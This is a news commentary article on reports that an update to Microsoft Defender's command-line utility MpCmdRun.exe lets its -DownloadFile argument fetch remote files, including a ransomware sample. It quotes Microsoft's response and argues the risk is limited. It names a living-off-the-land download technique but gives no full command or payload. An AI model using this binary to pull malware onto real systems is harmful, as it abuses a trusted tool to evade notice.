Earlier this week, the always informative Bleeping Computer reported that an update to Microsoft Defender Antivirus for Windows 10 users meant it could itself be used to download malware files. So, just how problematic is this and does it mean that Microsoft Defender Antivirus is now a security risk itself?
Microsoft Defender Antivirus can be used to download malicious files
The story seems to hang on the fact that an update to the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) has meant it can now download remote files. Remote files that could, potentially, be malicious in nature.
Indeed, so as to test this hypothesis, Bleeping Computer was able to do just that.
Using the new -DownloadFile command-line argument, as a local user, reporters were able to use MpCmdRun.exe to download the same WastedLocker ransomware sample as used against Garmin in the recent high-profile attack.
This appears to be quite alarming, but is that really the case? Of course, anything that opens up a new pathway of attack has to be taken seriously.
However, there are a few caveats to be considered before getting too worried that your Windows 10 computer security system has just eaten itself.
Has your Windows 10 security software just eaten itself?
This does appear to be a case of a living-off-the-land binary, or lolbin if you like, threat: the use of a seemingly genuine system file that can be used to attack a system without alerting the user.
However, any malicious file downloaded using this threat avenue will still be detected by Microsoft Defender Antivirus and so blocked from executing.
A Microsoft spokesperson confirmed as much when I asked for a statement: “Despite these reports, Microsoft Defender antivirus and Microsoft Defender ATP will still protect customers from malware. These programs detect malicious files downloaded to the system through the antivirus file download feature.”
The threat doesn’t extend to actually bypassing Windows 10 defenses then.
To download a file in the first place requires access to a local user account, be that admin or a limited-user one. The malicious file can’t, it would seem, be downloaded to another users’ folder or to those directories the attacker had no write privileges for.
Which means that privilege escalation doesn’t appear possible here.
Although I agree with Bleeping Computer that it does provide Windows 10 administrators with another executable to watch out for, and attackers with another to potentially exploit, I’m not going to be losing any sleep over this one.
The attack window, if you’ll pardon the pun, is somewhat limited, to say the least, and I suspect that it will have closed completely when the next Microsoft Defender Antivirus update comes along very shortly. I’m guessing this security hole won’t take two years for Microsoft to patch.